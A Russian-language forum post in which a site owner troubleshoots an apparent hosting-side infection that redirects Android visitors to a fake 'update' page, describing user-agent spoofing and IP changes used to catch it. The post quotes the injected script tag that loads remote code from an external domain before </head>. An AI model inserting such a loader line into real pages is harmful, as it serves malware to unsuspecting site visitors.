Подобная проблема и у меня (четыре раза за месяц). Грешил на яндекс, но расскажу свой метод решения этой проблемы.
Симптомы:
Заходим на сайт с устройства на Android, нас перебрасывает на сайт с предложением обновить какую-нибудь вещь. Заходим еще раз - грузится наш сайт. Если поменять ip, снова предложит "обновить" (установить вирус).
Диагноз от хостера:
"Проверьте htaccess, там скорей всего есть редирект. Обновите CMS. "
"Сервера не ломают, чтобы распростраянть вирус через пользователей. У нас все постоянно проверяется. Ищите у себя."
Действуем:
htaccess чист:
Options All -Indexes
<Files .htaccess>
order allow,deny
deny from all
</Files>
php_flag display_errors off
Ставим плагин для хрома(User Agent Switcher) на компе, чтобы выдать себя за андроид. Выключаем-включаем интеренет (меняется ip). Заходим на сайт видим редирект. Значит вирус поверил, что мы с андроида.
Популярной cms нет, движок написан ручками с нуля.
Просматриваем код страницы после нормальной загрузки (повторной). Все как обычно. Меняем ip. Обновляем страницу с исходным кодом и видим:
<script type="text/javascript" src="http://ad.energyoffsol.biz/ldr.php?21717218452"></script>
прям перед </head>
Благо есть тестовый домен на том же ip, что и зараженный. Заливаем туда index.php, htaccess, папку с js-скриптами с зараженного компа. Тестим (как было написано выше) - редирект :(
Удаляем все файлы из паки с js-скриптами. Тестируем - редирект :(
Удаляем все html-теги разметки, ссылки на css. Оставляем <html><head><title></title><пару ссылок на удаленные скрипты в папке js></head><body>111</body></html>. Тестирум - редирект(
Убираем половину тегов скрипт, а в остальных удаляем начало ("<sript"). Тестирум - редирект( Меняем ip, смотрим код - скрипт с редиректом (выше указанный) появился.
Удаляем все теги <script> (неработающие) - редиректа нет. Значит парсит по тегам <script>, даже битым.
Показываем хостеру одинокие .htaccess, index.php (без php и js), пустую папку "js" и спрашиваем какого лешего происходит редирект, если "на сервере вируса нет".
Название хостинга, говорить не буду. Посмотрим как оперативно они решат проблему.
